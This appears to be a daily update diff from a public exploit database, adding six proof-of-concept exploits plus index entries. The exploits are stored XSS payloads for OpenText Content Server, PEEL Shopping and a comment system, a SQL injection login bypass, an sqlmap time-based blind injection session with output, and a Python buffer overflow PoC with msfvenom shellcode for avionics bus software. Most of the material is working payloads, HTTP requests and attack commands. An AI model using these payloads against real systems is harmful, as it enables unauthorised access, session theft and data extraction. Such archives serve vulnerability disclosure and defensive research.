DB: 2021-02-20

6 changes to exploits/shellcodes

dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)
PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting
Comment System 1.0 - 'multiple' Stored Cross-Site Scripting
Online Exam System With Timer 1.0  - 'email' SQL injection Auth Bypass
OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting
Beauty Parlour Management System 1.0 - 'sername' SQL Injection

exploits/multiple/webapps/49578.txt

@@ -0,0 +1,72 @@
+# Exploit Title: OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting
+# Date: 19/02/2021
+# Exploit Author: Kamil Breński
+# Vendor Homepage: https://www.opentext.com/
+# Software Link: https://www.opentext.com/products-and-solutions/products/enterprise-content-management/content-management
+# Version: 20.3
+
+==========================================================================================
+1.) Document version XSS
+==========================================================================================
+
+A user with permissions to create new document versions could create a malicious stored cross-site  scripting  payload. The description value would be reflected by the server without proper sanitization resulting in a stored XSS vulnerability.
+
+------------------------------------------------------------------------------------------
+POST /otcs/cs.exe HTTP/1.1
+Host: redacted
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=--------------------------20043647051137266192675354452
+Content-Length: 2071
+Origin: https://redacted
+Connection: close
+[snipped]
+
+-----------------------------20043647051137266192675354452
+Content-Disposition: form-data; name="func"
+
+doc.addversion2
+-----------------------------20043647051137266192675354452
+Content-Disposition: form-data; name="nodeID"
+
+1125007
+[snipped]
+-----------------------------20043647051137266192675354452
+Content-Disposition: form-data; name="comment"
+
+<svg/onload=alert()>
+-----------------------------20043647051137266192675354452
+[snipped]
+------------------------------------------------------------------------------------------
+
+Next a user which visits the version site will execute the malicious javascript. An example URL will look like the following:
+------------------------------------------------------------------------------------------
+https://redacted/otcs/cs.exe?func=ll&objId=1125007&objAction=versions&nexturl=%2Fotcs%2Fcs%2Eexe%3Ffunc%3Dll%26objid%3D1121694%26objAction%3Dbrowse%26sort%3Dname
+------------------------------------------------------------------------------------------
+
+==========================================================================================
+2.) Project Banner XSS
+==========================================================================================
+
+A project banner could  be crafter in such a way  that  clicking it would result in the execution of user defined javascript. The application did not validate the scheme used by the user supplied URL and it could be set to "javascript://". The request which saved the payload on the server look like the following:
+
+------------------------------------------------------------------------------------------
+POST /otcs/cs.exe HTTP/1.1
+Host: redacted
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 479
+Origin: redacted
+Connection: close[snipped]
+
+func=ll&objAction=ConfigLookFeel&objId=1120281&currenttab=2&tab=1&roleid=0&newroleid=0&IMG1_ID=1129727&IMG1_PathSaved=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG1_Path=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG1_ALT=THISBANNERWILLEXECUTEJAVASCRIPT&IMG1_URL=JaVaScRiPt%3Aalert%28%27XSS%27%29&IMG2_ID=1129727&IMG2_PathSaved=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG2_Path=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG2_ALT=THISONETOO&IMG2_URL=JaVaScRiPt%3Aalert%28%27XSS%27%29
+------------------------------------------------------------------------------------------
+
+Next a user would have to browse to the project page and click on the project banner.
+
+==========================================================================================

exploits/php/webapps/49574.txt

@@ -0,0 +1,19 @@
+# Exploit Title: PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting
+# Date: 2021-02-16
+# Exploit Author: Anmol K Sachan
+# Vendor Homepage: https://www.peel.fr/
+# Software Link: https://sourceforge.net/projects/peel-shopping/
+# Software: PEEL SHOPPING 9.3.0
+# Vulnerability Type: Stored Cross-site Scripting
+# Vulnerability: Stored XSS
+# Tested on Windows 10 XAMPP
+# This application is vulnerable to Stored XSS vulnerability.
+# Vulnerable script: http://localhost/peel-shopping_9_3_0/achat/achat_maintenant.php
+# Vulnerable parameters: 'Comments / Special Instructions :'
+# Payload used:
+
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
+)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
+
+# POC: in the same page where we injected payload refresh the page.
+# You will see your Javascript code (XSS) executed.

exploits/php/webapps/49575.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Comment System 1.0 - 'multiple' Stored Cross-Site Scripting
+# Date: 2021-02-18
+# Exploit Author: Pintu Solanki
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14713/comment-system-phpmysqli-full-source-code.html
+# Software: : Comment System 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+# Vulnerable Page: http://localhost/comment/index.php
+# Vulnerable Input Field :
+
+Your Name:  "><script>alert(document.cookie)</script>
+
+Comment:    "><script>alert(document.cookie)</script>
+
+# Payload used:
+
+"><script>alert(document.cookie)</script>
+
+# POC: Whenever we will go to the page (http://localhost/comment/index.php) where the script is injected, the stored script will be executed.
+# You will see your Javascript code (XSS) executed.

exploits/php/webapps/49576.txt

@@ -0,0 +1,15 @@
+# Exploit Title: Online Exam System With Timer 1.0  - 'email' SQL injection Auth Bypass
+# Date: 2021-02-18
+# Exploit Author: Suresh Kumar
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/13877/online-exam-timer.html
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+# This application is vulnerable to SQL injection vulnerability.
+# Vulnerable Page: http://localhost/CEE/adminpanel/admin/index.php
+# Payload used:
+
+Email    => ' or 'x'='x
+Password => ' or 'x'='x
+
+# POC: Whenever we will go to the page (http://localhost/CEE/adminpanel/admin/index.php) when we inject SQL Payload then we will directly enter into the Admin Panel page.

exploits/php/webapps/49580.txt

@@ -0,0 +1,92 @@
+# Exploit Title: Beauty Parlour Management System 1.0 - 'sername' SQL Injection
+# Date: 19/2/2021
+# Exploit Author: Thinkland Security Team
+# Vendor Homepage: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/wp-content/uploads/2019/08/Beauty-Parlour-Management-System.zip
+# Version: V 1.0 
+# Tested on: Windows、XAMPP
+
+# Identify the vulnerability
+1. go to http://localhost/bpms/admin/ and login with your account
+2. then go to http://localhost/bpms/admin/edit-services.php?editid=17 
+3. Save the packet data as 3.txt
+
+POST /bpms/admin/edit-services.php?editid=17 HTTP/1.1
+Host: http://localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 71
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/bpms/admin/edit-services.php?editid=17
+Cookie: PHPSESSID=qaqv7jl8dqci4i2nldnj4n60s0
+Upgrade-Insecure-Requests: 1
+
+sername=%3Cimg+src%3D1+onerror%3Dalert%28%2Fxss%2F%29%3E&cost=1&submit=
+
+
+
+# Exploit
+
+Now you can exploit it using sqlmap
+
+command: sqlmap -r file --batch --dbms=mysql --current-db 
+
+example: sqlmap.py -r 3.txt --batch --dbms=mysql --current-db 
+
+
+
+       __H__
+ ___ ___[.]_____ ___ ___  {1.4.10.16#dev}
+|_ -| . [.]     | .'| . |
+|___|_  [)]_|_|_|__,|  _|
+      |_|V...       |_|   http://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+[*] starting @ 09:30:14 /2021-02-19/
+
+[09:30:14] [INFO] parsing HTTP request from '3.txt'
+it appears that provided value for POST parameter 'sername' has boundaries. Do you want to inject inside? ('<img src%3D1 onerror%3Dalert(/xss*/)>') [y/N] N
+[09:30:14] [WARNING] provided value for parameter 'submit' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
+[09:30:14] [INFO] testing connection to the target URL
+[09:30:15] [INFO] testing if the target URL content is stable
+[09:30:15] [INFO] target URL content is stable
+[09:30:15] [INFO] testing if POST parameter 'sername' is dynamic
+[09:30:15] [WARNING] POST parameter 'sername' does not appear to be dynamic
+[09:30:15] [WARNING] heuristic (basic) test shows that POST parameter 'sername' might not be injectable
+[09:30:15] [INFO] testing for SQL injection on POST parameter 'sername'
+[09:30:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
+[09:30:15] [WARNING] reflective value(s) found and filtering out
+[09:30:16] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
+[09:30:16] [INFO] testing 'Generic inline queries'
+[09:30:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
+[09:30:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
+[09:30:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
+[09:30:16] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)
+[09:30:26] [INFO] POST parameter 'sername' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
+for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
+[09:30:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
+[09:30:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
+[09:30:27] [INFO] checking if the injection point on POST parameter 'sername' is a false positive
+POST parameter 'sername' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
+sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
+---
+Parameter: sername (POST)
+&nbsp;&nbsp;&nbsp; Type: time-based blind
+&nbsp;&nbsp;&nbsp; Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+&nbsp;&nbsp;&nbsp; Payload: sername=<img src=1 onerror=alert(/xss/)>' AND (SELECT 3311 FROM (SELECT(SLEEP(5)))YaHW) AND 'HGFO'='HGFO&cost=1&submit=
+---
+[09:30:42] [INFO] the back-end DBMS is MySQL
+[09:30:42] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
+do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
+back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
+[09:30:47] [INFO] fetching current database
+[09:30:47] [INFO] retrieved:
+[09:30:57] [INFO] adjusting time delay to 1 second due to good response times
+bpmsdb
+current database: 'bpmsdb'
+[09:31:15] [INFO] fetched data logged to text files under

exploits/windows/local/49577.py

@@ -0,0 +1,61 @@
+# Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)
+# Exploit Author:  Kağan Çapar
+# Date: 2020-02-17
+# Vendor Homepage: https://www.ddc-web.com/
+# Software Link: https://www.ddc-web.com/en/connectivity/databus/milstd1553-1/software-1/bu-69414?partNumber=BU-69414
+# Version: 4.5.3
+# Tested On: Windows 10 Enterprise (x64)
+# about Sofware: 
+# dataSIMS, an all-in-one Avionics Bus Analysis & Simulation Software Tool, provides an easy-to-use graphical interface, simplifying any MIL-STD-1553 or ARINC 429 testing effort.
+# about ARINC 664-1:
+# ARINC 664 is a multipart specification that defines an Ethernet data network for aircraft installations. 
+# Part 7 of ARINC 664 defines a deterministic network, also known as Avionics Full Duplex Switched Ethernet (or AFDX®).
+
+#!/usr/bin/env python
+# -*- coding: UTF-8 -*-
+
+import struct
+import binascii
+import os
+import sys
+
+#EAX : 00000000
+#EBX : 00000000
+#ECX : 42424242
+#EDX : 77B96330     ntdll.77B96330
+#EBP : 000A1328
+#ESP : 000A1308
+#ESI : 00000000
+#EDI : 00000000
+#EIP : 42424242
+#EFLAGS : 00010246
+
+#LastError : 00000000 (ERROR_SUCCESS)
+#LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND)
+#Last chance expection on 42424242 (C0000005, EXPECTION_ACCESS_VIOLATION)!
+
+file = open("milstd1553result.txt", "w")
+junk = "\x41" * 600
+align = "\x32" * 4 + "\x31" * 4
+prop = "\x43" * 380
+imp = "\x62\x7a\x68\x72\x74\x75\x72\x6c\x75\x32"
+imp2 = "\x61\x72\x61\x63\x61\x67\x131\x7a"
+
+#EIP Overwrite junk value
+overwrite = "\x42" * 4
+
+#Payload size: 29 bytes
+#Final size of py file: 160 bytes
+
+#msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai
+
+buf =  b""
+buf += b"\xda\xc1\xd9\x74\x24\xf4\x58\xbb\x0b\x7e\x97\x62\x33"
+buf += b"\xc9\xb1\x01\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\xe9"
+buf += b"\x8b\x7c\x9c"
+
+win32 = junk + align + prop + imp + imp2 + overwrite + buf
+
+print len(win32)
+file.write(win32)
+file.close()

files_exploits.csv

@@ -11174,6 +11174,7 @@ id,file,description,date,author,type,platform,port
 48465,exploits/windows/local/48465.py,"Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)",2020-05-13,gurbanli,local,windows,
 48469,exploits/windows/local/48469.py,"Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)",2020-05-14,gurbanli,local,windows,
 48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,
+49577,exploits/windows/local/49577.py,"dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)",2021-02-19,"Kağan Çapar",local,windows,
 48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,
 48499,exploits/windows/local/48499.txt,"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)",2020-05-21,"Xenofon Vassilakopoulos",local,windows,
 48505,exploits/windows/local/48505.txt,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation",2020-05-22,"Matteo Malvica",local,windows,
@@ -43174,6 +43175,11 @@ id,file,description,date,author,type,platform,port
 48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",2020-05-12,"Dylan Garnaud",webapps,java,
 48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",2020-05-12,Besim,webapps,php,
 48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",2020-05-12,"Anthony Cole",webapps,java,
+49574,exploits/php/webapps/49574.txt,"PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting",2021-02-19,"Anmol K Sachan",webapps,php,
+49575,exploits/php/webapps/49575.txt,"Comment System 1.0 - 'multiple' Stored Cross-Site Scripting",2021-02-19,"Pintu Solanki",webapps,php,
+49576,exploits/php/webapps/49576.txt,"Online Exam System With Timer 1.0  - 'email' SQL injection Auth Bypass",2021-02-19,"Suresh Kumar",webapps,php,
+49578,exploits/multiple/webapps/49578.txt,"OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting",2021-02-19,"Kamil Breński",webapps,multiple,
+49580,exploits/php/webapps/49580.txt,"Beauty Parlour Management System 1.0 - 'sername' SQL Injection",2021-02-19,"Thinkland Security Team",webapps,php,
 48466,exploits/php/webapps/48466.txt,"Tryton 5.4 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,
 48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,
 48468,exploits/php/webapps/48468.py,"Complaint Management System 1.0 - 'username' SQL Injection",2020-05-14,"Daniel Ortiz",webapps,php,